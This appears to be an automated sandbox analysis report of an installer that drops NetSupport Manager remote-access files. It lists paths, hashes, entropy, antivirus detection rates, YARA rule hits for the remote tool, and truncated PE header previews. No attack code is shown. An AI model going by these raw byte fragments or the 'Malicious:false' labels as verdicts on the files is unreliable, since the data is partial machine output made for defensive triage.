                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................1q......w.....j.....z......o..\.....C.`....B....Y.....r......s......t....Rich...................PE..L...2.oe...........!......................................................................@.........................P................`..4............H...]...p..,?.. ................................................................................text..._........................... ..`.rdata..$@.......B..................@..@.data....l.......6..................@....rsrc...4....`......................@..@.reloc..P@...p...B..................@..B................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIMSG.DLL

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):56288
                                                                                      Entropy (8bit):5.934323135362062
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:j8OV1u6Jr2pe/6QHDHf/ckSCr2pe/DryHDHf/ckI:jRee/RjHpee/KjH0
                                                                                      MD5:5758E67FBD1984B6E43648C8568FB4EE
                                                                                      SHA1:6C1CD32D27EA2719668FE1ADEBDD8AF626814007
                                                                                      SHA-256:2723D3EC822F369E1C083085335C86D9FD94367DDF36BB2047BBCE0DAE59AA7D
                                                                                      SHA-512:C3743E4499509E384E00C14C0C5467A0C2F337201C868A1426010F5A086F3B5C74A4E97D006042835902E0332D2833FCCD30ECFA9DD8D17F3AB109976B5AC6B1
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}.................................Rich....................PE..L.....oe...........!.........x............... .... .................................x.....@.......................................... ...v...........~...]...........................................................................................text............................... ..`.rsrc....v... ...x..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIRES.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):2976736
                                                                                      Entropy (8bit):7.559871297074836
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:tl4QLOK6L9jK36nyJrqfz2BJ24PomOTLuXUddgoo4J2:tl4W6L9jO6oGKBJqLuXUAojJ2
                                                                                      MD5:62629F14DF2B43A013EA9FE115CBB008
                                                                                      SHA1:35F7220685F4A32AA43A43A382C9D4523F6C5D0C
                                                                                      SHA-256:D617C40A780E21CDBE062C305370655437F5CBF5FF4F84D09E4FCC3F81133561
                                                                                      SHA-512:B95360929507CCF02B90362AD42042546F4B992831F551EA17DCEBF8BC7C5FC7F0604013C5781A3B5442AEA3B56B4B105BF3651EA0A0B0568F4BBD1677398D6F
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIRES.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x.d.<`..<`..<`..S....`..S...,`..5...?`..<`..r`..S..._`..S...=`..S...=`..Rich<`..........PE..L.....oe...........!.....l....+..... ........................................P-......-...@.....................................(....0..P.*...........-..]....-.t.......................................@............................................text....k.......l.................. ..`.rdata..Tw.......x...p..............@..@.data....,..........................@....rsrc...P.*..0....*.................@..@.reloc..PF....-..H....,.............@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIVDD.DLL

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):44576
                                                                                      Entropy (8bit):5.569926928492802
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:kFPPr2pe/b2ZHDHf/ckwlp6r2pe/ijHDHf/ckm:khDee/YjHUCee/ejHS
                                                                                      MD5:2FF563D9CF8AFABBADF04009667B0FFF
                                                                                      SHA1:335EE10CC1A6B52219EFDC6B765A4820594BF928
                                                                                      SHA-256:D9F1FD8CAEE025BBC4193B9F2637E8577D51DE3129C5E9541B6CBDC02B4F98E6
                                                                                      SHA-512:26948D04ED4920FF9A77CCB8A2333038F7EEF0F59E8889A2B6DAE34350537A22C0D687F7F2EA2DB5B1AF8DCDB120EBBB683801FF8C026BC42DC167B22001E964
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIVDD.DLL, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?1j.{P..{P..{P..{P..aP..{P..iP...XY.|P..Mv..yP...p..zP..Rich{P..........PE..L.....oe...........!.........0...... ........ ...............................P.......b..............................P$..e.... ..d...................@P...]...@....... ............................................... ...............................text...\........................... ..`.rdata....... ....... ..............@..@.data........0.......0..............@....reloc.......@.......@..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIhtmlgen.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):2891744
                                                                                      Entropy (8bit):6.679546690054984
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:dbpvdeyqfF2Mbwnij1QdEdJh2skJxwj934JFCb4l5uUPyWWuDQIlF7zePcFtFc6R:d98fdbwniqdEfh2skJxwj934FCb88UP3
                                                                                      MD5:F7642B7DE834924F1470830D214D9D53
                                                                                      SHA1:C816AA12D0E64D6B89AF134D4EE8339FB547E502
                                                                                      SHA-256:D4083381EA6F1364137F5F7DEF093CEF5554718F37299B0A8832BE622F0F74C6
                                                                                      SHA-512:5E128EBD6392A84715E18C405E8502E0B5DAC2DDE64F88919911F854F2C60A8AE1FC24FFF3429270960564882D18471104E66DF68267D1C5F7374732F44B8BD2
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIhtmlgen.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.@..r...r...r..v...Xr...r/.wq..v...tr......Tr.......r.......s......~r......~r......~r..Rich.r..........PE..L...u.oe...........!.....D ..z...............` ..............................p,.....s.,...@...........................(.n....>(.......).,.............+..]....).....Pp ...............................%.@............` .l............................text....C ......D ................. ..`.rdata... ...` .."...H .............@..@.data...H.....(......j(.............@....rsrc...,.....).......).............@..@.reloc..P.....).......).............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIinv.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):2934240
                                                                                      Entropy (8bit):6.695777901099138
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:lp3sVlUmDVC4SxoOQnIfZVuLDo1f80nW2rzVtn11wZRNMobc2QSBa4sHsYbf5f5e:iUmDvbO1fZVeDo1f80nW2rzVmZnMClQu
                                                                                      MD5:0830B115A3595DBB15A5C153AA17DB44
                                                                                      SHA1:1B3D19542C25E74E95024F2EBA1F5C3373316AB2
                                                                                      SHA-256:FCF7B187FF10860C26CBF999C726475C3E12CE27D7CA3D70388AA25B286D4C1E
                                                                                      SHA-512:D22DDFFF15A0654DBD7B49B7255EB8BB01C4D3EA149DC3B586468CCA4447940C249319664CA68BBAC07857D5BBEDBCC02D7AC62B0C432763EEC2AE399AA5225B
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIinv.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`..................................... ......O.....................Rich...........PE..L.....oe...........!...... ..........+........!..............................`-.......-...@.........................@;).t.....(.......*.4............h,..]....*. ...0.!.............................h.%.@.............!.L...,.(.@....................text..... ....... ................. ..`.rdata...;....!..<.... .............@..@.data....B...@)......").............@....rsrc...4.....*.......).............@..@.reloc........*.......).............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\StoreInvDll.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):92640
                                                                                      Entropy (8bit):6.734732819126988
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:cqDAGQoJ0iJ0FG6C2uIHI5oskMfzNUbImR4NB+iOfGdVUdTee/njHlee/RjHV:BPQoLJnl2umI5osrzibImR4NBjOfGdVm
                                                                                      MD5:05835B95CA60D3B36412E006AD2FDD0E
                                                                                      SHA1:1D558CBE48BF0C5FB91C62E02A09201A0C6A406A
                                                                                      SHA-256:35B518AE2E1BBE963F9CD996A566C00A6825B52A01A08AF52B642363B33B96BE
                                                                                      SHA-512:AF28C3631627246C022515339D5C3B6A62D0B83C5CB54F918DF3EA88ED6439BF5E8BABC2E92EE105EDF31394E97948D8F87D44F7C9DBFD9EE3984023A14EE383
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\StoreInvDll.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E......[...[...[...[...[n.([...[n..[...[n..[...[n.*[...[...[G..[..%[...[..2[...[n..[...[n.-[...[n.,[...[n.+[...[Rich...[........................PE..L.....oe...........!.........t......t........................................@............@.............................t...............H................]... ..$......................................@............................................text...n........................... ..`.rdata..4N.......P..................@..@.data...............................@....rsrc...H...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\TCCTL32.DLL

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):471008
                                                                                      Entropy (8bit):6.6933780240823175
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:7+MEmCOirSwXCHVs5QroHNgstVJ9lf8Mu3qyPKLK/:7+MEp5IsV4Mu6yPK4
                                                                                      MD5:0F0C9E34BABB2BA2036E9A4CD4F70FEB
                                                                                      SHA1:5EFB10AFCA796CC5699A79AB49FF56AC92BEDE25
                                                                                      SHA-256:BE063E964439510E9303BF0CC03E5CDA3169A5E115609519A608D1BF05705EA5
                                                                                      SHA-512:C4716B2BBFBC92C6D39013911DF923EDF2EAB7C460193EB8C3BC121E5EC58850E54E8E3B4C8B71FCD4FEBC308FABDA65AE2A91BED10006029CD40F6DB504B960
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\TCCTL32.DLL, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E...+...+...+......+...*...+......+......+.....+......+......+......+.Rich..+.........................PE..L...g.af...........!.....Z...t......xR.......p...............................p.......B....@..........................s.......f..........@................]... ...I...r...............................G..@............p...............................text....X.......Z.................. ..`.rdata..i....p.......^..............@..@.data................f..............@....rsrc...@............~..............@..@.reloc...J... ...L..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWVI.DLL

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):206304
                                                                                      Entropy (8bit):6.814671479498648
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:mCAq0fb1suXPEToF+HauQ0wpiEAOseIeN:PiRsu8ToEHnQ0wC8xN
                                                                                      MD5:A314D8185FCEF3D4B3B01542991B8AF4
                                                                                      SHA1:CCE615B170CED2D4C15D073EF0F60D1FA83FC845
                                                                                      SHA-256:04C0240CA1F248472CB080E873B88BF79F60E5894B1118DCC8DAB33A13C505A1
                                                                                      SHA-512:9F6DC292AA94D4579EE9949DA4E68693B2CE21F43D77CF8F9AEA09E7F40CF16F0C131F29DAB9AE78A9D059F076BFF65C95D20A971AEE7E7E651F55376A0132C5
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWVI.DLL, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........9..yj..yj..yj...j..yj..j..yj..j..yj..xj..yj...j..yj...j..yj...j..yj...j..yj...j..yjRich..yj........................PE..L.....oe...........!.....*...........Y.......@............................... .......|..............................`...........d.......\................]...........A..............................xy..@............@..l............................text....).......*.................. ..`.rdata..&a...@...b..................@..@.data...|3..........................@....rsrc...\...........................@..@.reloc..l...........................@..B................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWXP.DLL

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):45536
                                                                                      Entropy (8bit):7.0739520347335105
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:uPReRnverIpOBvrs+onaJQJdTFc/4BdOnDhdHu4quUr2pe/CjSHDHf/ckY4r2pe8:sR6verIpyvrFo6Q9c/EdOnXu410ee/CL
                                                                                      MD5:E36489E8AACE1404DC78794A10E3458A
                                                                                      SHA1:CD49AE49F2DF49915BA838766D803A9CBA5CCB65
                                                                                      SHA-256:C85614EEEE02F6CE19789B9A8259EE1CC020F6F635EC66AABB26500F0F70F653
                                                                                      SHA-512:3B2CAFA80B4B3F2CD83D5DB9B6E4C9E7032605E59671CAB172C11D17268D772A02B5EBB5B14490823497E221E7586D713D61FE0C6312F8FEE7514ACDC71C00DB
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWXP.DLL, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5..JT..JT..JT..%"j.NT....n.KT..%"h.IT..%"\.GT..C,e.MT..JT..sT..%"].BT..|r..KT..%"m.KT..%"l.KT..%"k.KT..RichJT..................PE..L.....oe...........!.....*...&.......0.......@......................................X.....@..........................T..}....M..x....p..\............T...]...........A...............................D..@............@...............................text...%(.......*.................. ..`.rdata..}....@......................@..@.data........`.......D..............@....rsrc...\....p.......F..............@..@.reloc...............N..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\WINSTALL.EXE

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):763872
                                                                                      Entropy (8bit):6.574853256300612
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:UwBfoW/SGOLyn5PmPgLmkgM2uyIXEFH9YI/WIvSGvmm5s3qGGaG6rn5ax77/v10E:F6IqkgM2uyIqH93/WIvOqMR/YfMl2eTS
                                                                                      MD5:0FCF65C63E08E77732224B2D5D959F13
                                                                                      SHA1:5419B79FE14E21D1D5B51FE8187F7B86EC20DE74
                                                                                      SHA-256:F3E587F94A79C46A603B39286E93B17FABC895C6B71B26B0FC5D812CF155B7E5
                                                                                      SHA-512:7C289AAF3AC1B998C8CA9593A58C8AA3A9AA9F41852C1ED4192B908E0AD51871400D585B4FE508D49368BDFC7378807D289971914870A7A47B0410A946E5E381
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\WINSTALL.EXE, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)..H.H.H.3.l..H..>j..H.0w..H.0g..H.H..>I..>^..H..>_..H..>o..H..>n..H..>i..H.Rich.H.................PE..L.....oe.................t........................@..........................0............@..........................c.......@..,....P..(Y...........J...]......Lo.. ...................................@...............\....=..@....................text....s.......t.................. ..`.rdata..t............x..............@..@.data...@....p...0...N..............@....rsrc...(Y...P...Z...~..............@..@.reloc...p.......r..................@..B................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\WdfCoInstaller01005.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1419232
                                                                                      Entropy (8bit):7.97986719531702
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:M3Nqv+8N7hdPgL8hKnCThLv7AEeRP/HM8Z4Sx5cTI25oWOQt:M82A7/PjACTFAEgb7bmos
                                                                                      MD5:F9CF2DB8B99DC50EAB538C4D860AC1A4
                                                                                      SHA1:B261C9E7F082EB8649AFAB9A677E022F84FD2823
                                                                                      SHA-256:865864A32AEE78E588764F37847522FDB0BD1940ECD73B3C49D8F68B4D5BAD71
                                                                                      SHA-512:59660740B58B1761A4658AEB02F669F1FD8A3FCB07C162A86B9565C5F9219CB993CC9D94B43B1D39EDCD5032B478B8A9B3A388FB82449CA82A83E3C6DD94C02D
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*qQ.n.?.n.?.n.?.I.B.i.?.n.>...?.I.D.}.?.I.Q.a.?.I.E.o.?.I.R.).?.I.A.o.?.I.C.o.?.I.G.o.?.Richn.?.................PE..L.../.IE...........!...............................................................a.....@.........................0................ ..p...........................................................0`..@............................................text............................... ..`.data....G..........................@....rsrc...p.... ......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\_Data.lnk

                                                                                      Download File
                                                                                      Process:C:\Windows\Installer\MSI1387.tmp
                                                                                      File Type:MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):1726
                                                                                      Entropy (8bit):2.3294570493090614
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:8gXEwRsXUCV/tz0/CSL08nKw2aZlw2nZluMJ82o2nMvO4NHUR9sL1MJ82o2n3CNq:8CurWLjKwbwGN+LGMvO4uRQq+LGm6y
                                                                                      MD5:94F5BEDD233034445791C9C9CB9509FE
                                                                                      SHA1:FA5F349015106D63296A63CCE846B692B51BAC22
                                                                                      SHA-256:E3E89D7719970663A1EC2D2A4B4F750242FE4263FDF23EDA33AC347E38E6C23D
                                                                                      SHA-512:9CBF78ECAD91745D4794D5BCD62B5EF5808A76E32AF25648FAE896A40CB412A60FD755FB37BE1F42DD2181B9606AEFB2BAA001E19D4D35CBAFF8AB6C1F3E51EB
                                                                                      Malicious:false
                                                                                      Preview:L..................F........................................................W....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................A.r.t.h.u.r.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....`.1...........NetSupport..F............................................N.e.t.S.u.p.p.o.r.t.....x.2...........NetSupport Manager..V............................................N.e.t.S.u.p.p.o.r.t. .M.a.n.a.g.e.r..."...C.....\.....\.....\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.N.e.t.S.u.p.p.o.r.t.\.N.e.t.S.u.p.p.o.r.t. .M.a.n.a.g.e.r.........%USERPROFILE%\AppData\Roaming\NetSupport\NetSupport Manager........................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\_Shared Data.lnk

                                                                                      Download File
                                                                                      Process:C:\Windows\Installer\MSI1387.tmp
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Directory, ctime=Sat Nov 23 00:54:08 2024, mtime=Sat Nov 23 00:54:08 2024, atime=Sat Nov 23 00:54:08 2024, length=0, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):1575
                                                                                      Entropy (8bit):3.022233693470855
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:8E4wwlSK0cwAke90eGvKD/o8R28/b+/B8R2nyjAi2ihNlcb72o2nMfFEhE2o2nxf:8hjkv67zRHDuaRGOAuC7LGMSELGxY8m
                                                                                      MD5:18C6713328C2BCDD17E1E09084AD2DFF
                                                                                      SHA1:508189175A046EECB7EC61D7E9E5B6390DC49DFC
                                                                                      SHA-256:6EF4D58A52814F5B4B0739403B2B54649A16DB90DB47920C904BFF7176206DDA
                                                                                      SHA-512:C80CB343A0747C0348C13B8F0C1C06F5E98AC742B2C0DC777DCD7EF60D5AD2614A86A61116F2E709B3E3247846D64A208951C45A43FB4DE1D33AEAEF29200983
                                                                                      Malicious:false
                                                                                      Preview:L..................F..... ..V..J=..V..J=..V..J=..........................[....P.O. .:i.....+00.../C:\...................`.1.....wY... PROGRA~3..H......O.IwY.......t....................."..P.r.o.g.r.a.m.D.a.t.a.....^.1.....wY... NETSUP~1..F......wY..wY......\......................"..N.e.t.S.u.p.p.o.r.t.....n.1.....wY... NETSUP~1..V......wY..wY......]......................"..N.e.t.S.u.p.p.o.r.t. .M.a.n.a.g.e.r.......[...............-.......Z............;L......C:\ProgramData\NetSupport\NetSupport Manager..2.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.N.e.t.S.u.p.p.o.r.t.\.N.e.t.S.u.p.p.o.r.t. .M.a.n.a.g.e.r.........%ProgramData%\NetSupport\NetSupport Manager.........................................................................................................................................................................................................................%.P.r.o.g.r.a.m.D.a.t.a.%.\.N.e.t.S.u.p.p.o.r.t.\.N.e.t.S.u.p.p.o.r.t. .M.a.n.a.g.e.r.............................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-console-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):19136
                                                                                      Entropy (8bit):6.960788331628294
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:bvmMWVghW/ivSx9YOCAs/nGfe4pBjSf+GEOWNArXVWQ4mWPQ4mqnajxcRGlPMRdk:XW2hWKSUA0GftpBjxDib4mll7PedGSk
                                                                                      MD5:37DA7F6961082DD96A537235DD89B114
                                                                                      SHA1:DAA1E2E683FA0512FF68EB686D80B4AA3B42E5B6
                                                                                      SHA-256:6EE46C6B6727EB77BCBCDD54DC506680CA34AF7BC7CA433B77775DE90358844E
                                                                                      SHA-512:AF4F28E3319344D2E215F56026E9CEE5C951B5C44374C7EEEA6790D18F174D7E785CEACBBF1450D5CA1D76F207B5F7B4F24674468F30BE84C6C3E90C48CE2A2C
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................+............ ...................<..............8............................................................................text...;........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-datetime-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):18624
                                                                                      Entropy (8bit):6.97464085764015
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:sZWVghW/Y7l9YOCAs/nGfe4pBjSfXVJ4WNArXVWQ4mWGqnajxcRGlPMRd54kft:4W2hWQ7QA0GftpBjcqRll7PedGkft
                                                                                      MD5:3B3BD0AD4FEA16AB58FCAEAE4629879C
                                                                                      SHA1:EB175F53640FB8AC4028A7657BBF48823A535677
                                                                                      SHA-256:DCB9CF7E31D6772434C683353A1514F10D87D39FEAA9B3EDF3FA983B2988294C
                                                                                      SHA-512:F206E7F56A218A1725F212B20416210C228E60D0D3C44F9A598C93ACB10BF8A3C961B4C4D104AE0F166598BE5C5102A1FF77A39D2B70743E784F69C82FD4C730
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......S....@.......................................... ...................<..............8............................................................................text... ........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-debug-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):18624
                                                                                      Entropy (8bit):6.982441576564087
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:NvW2hW+77QA0GftpBjuYvd0WrlI663Upe:NR9yi866kQ
                                                                                      MD5:584766DF684B2AD2A3A5B05A5B457FAC
                                                                                      SHA1:C207B7AEDB8D978C8320A1454331519A8365F20D
                                                                                      SHA-256:B15964D49A2C5219E0923137AA9028611BE81FDBDCBB0D43BB3AAA23114E401F
                                                                                      SHA-512:3BC7D49F997E489466858A21DAA22B397ADB8E736D7E064542ED5F73CD87B52CBD412CDEC2B4B892F9231C2562E24C8DEBAB73054E878405F2B2A022E86D26B8
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......!h....@.......................................... ...................<..............8............................................................................text...+........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-errorhandling-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):18624
                                                                                      Entropy (8bit):7.00674396465633
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:+F87mxD3XWVghW/IvSx9YOCAs/nGfe4pBjSf/qoWNArXVWQ4mWBqnaj9RlS6Vab:h70W2hWQSUA0GftpBjoqUOlBRAkO
                                                                                      MD5:906CB0C8ABA8342D552B0F37DDFD475F
                                                                                      SHA1:A3CD528B9C212FEA97495A557A91D638B1608418
                                                                                      SHA-256:582E87ADE6DAC258844154B068C291FF8D8F6D7AB6EE029FCD3CF1391874C74B
                                                                                      SHA-512:27B33658A30010E0C6A09F5B1359A9E39871B7851D0CFB43F5E2063FB77DAFB34DF9724FCE82FC7826463104FEE0820AE4E996A76DD3912490689686EA05844B
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
